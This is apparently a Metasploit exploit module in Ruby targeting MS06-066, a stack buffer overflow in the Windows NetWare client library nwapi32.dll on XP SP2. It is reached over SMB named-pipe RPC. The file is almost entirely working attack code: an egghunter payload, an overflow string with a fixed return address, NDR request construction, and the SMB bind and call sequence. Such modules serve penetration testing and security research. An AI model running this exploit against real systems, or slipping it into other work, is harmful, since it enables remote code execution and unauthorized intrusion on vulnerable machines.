Path: blob/master/modules/exploits/windows/smb/ms06_066_nwapi.rb
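##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# MS06-066: stack buffer overflow in nwapi32.dll (NetWare client service
# hosted in svchost), reached over MSRPC on a named pipe via SMB.
#
# Delivery shape (see #exploit): an egghunter stub plus the hard-coded
# return address ride inside an overlong UTF-16 "\\..." string argument to
# opnum 9 of interface e67ab081-9844-3521-9d32-834f038001c0; the tagged egg
# that carries the real payload is appended after the RPC arguments so the
# hunter can locate it in memory. The single target is Windows XP SP2 and
# the return address is a fixed constant, so this is not expected to work
# on other builds.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS06-066 Microsoft Services nwapi32.dll Module Exploit',
        'Description' => %q{
          This module exploits a stack buffer overflow in the svchost service when the netware
          client service is running. This specific vulnerability is in the nwapi32.dll module.
        },
        'Author' => [ 'pusscat' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2006-4688'],
          [ 'OSVDB', '30260'],
          [ 'BID', '21023'],
          [ 'MSB', 'MS06-066'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Privileged' => true,
        'Payload' => {
          # Space is the room the egg gets; the egghunter stub itself is
          # size-limited separately by buflen in #exploit.
          'Space' => 296,
          'BadChars' => "",
          'Compat' =>
          {
            # -ws2ord XXX?
          },
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows XP SP2',
            {
              # Fixed address written over the saved return pointer; see
              # ofstring in #exploit. Only valid for this one build.
              'Ret' => 0x00EBEEEC,
            },
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2006-11-14',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'srvsvc']),
      ]
    )
  end

  # Builds the malformed RPC request, connects over SMB, binds to the
  # vulnerable interface on the configured pipe and issues the call.
  #
  # Returns true only when the server answered with the specific 12-byte
  # stub the original author treats as the "expected" reply, false
  # otherwise. A NoResponse or STATUS_PIPE_DISCONNECTED from the call is
  # swallowed (both are consistent with the service crashing into the
  # payload); any other error is re-raised.
  def exploit
    # Apparent IDL of the called function, as annotated by the author:
    # [in] [unique] wchar *
    # [in] wchar *
    # [in, out] long
    # [out] handle

    # generate_egghunter returns the hunter stub and the tagged egg; the
    # egg wraps payload.encoded (with a checksum) so the stub can find it.
    hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
    egg = hunter[1]
    # print_status("Today, we'll be hunting for 0x#{egg.unpack("V")[0]}")

    # Large random guard blocks on either side of the egg so it lands
    # somewhere the hunter's scan will reach regardless of exact layout.
    eggdata =
      rand_text(1024) +
      egg +
      rand_text(1024)

    # Overflowing string argument, laid out as:
    #   UTF-16 "\\"  | NOP | egghunter stub | random pad to buflen |
    #   target.ret (LE dword) | NUL
    # buflen bounds stub + pad at 295 bytes so the return address lands at
    # the offset the author determined for XP SP2.
    buflen = 295
    ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + rand_text(buflen - hunter[0].length) +
      [ target.ret ].pack('V') + "\x00"
    # ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00"

    # NDR-encoded request body for opnum 9. The overflowing string is
    # pre-built so its length fields are not recomputed from ofstring, and
    # the egg block trails the real arguments.
    stubdata =
      NDR.long(rand(0xffffffff)) +
      NDR.UnicodeConformantVaryingString("\\\\BBBB") +
      NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE!
      # NDR.UnicodeConformantVaryingString('\\\\' + "A"*1024 + "\x00") +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      # NDR.long((ofstring.length * 2) + 0xC) +
      eggdata

    print_status("Connecting to the SMB service...")
    connect()
    smb_login()

    handle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    print_status("Calling the vulnerable function...")

    begin
      dcerpc.call(0x09, stubdata)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      print_status('Server did not respond, this is expected')
    rescue => e
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
        print_status('Server disconnected, this is expected')
      else
        raise e
      end
    else
      # The reply is server-controlled bytes; hex-encode it rather than
      # writing it raw into the operator's console, where arbitrary
      # bytes (including terminal escape sequences) would be interpreted.
      reply = dcerpc.last_response.stub_data
      print_status("Got #{reply.length} bytes: #{reply.unpack('H*').first}")
    end

    # Cleanup
    handler
    disconnect

    # Report success only on the exact 12-byte reply the author expects;
    # the meaning of this constant is not documented in the module.
    resp = dcerpc.last_response
    !resp.nil? && resp.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00"
  end
end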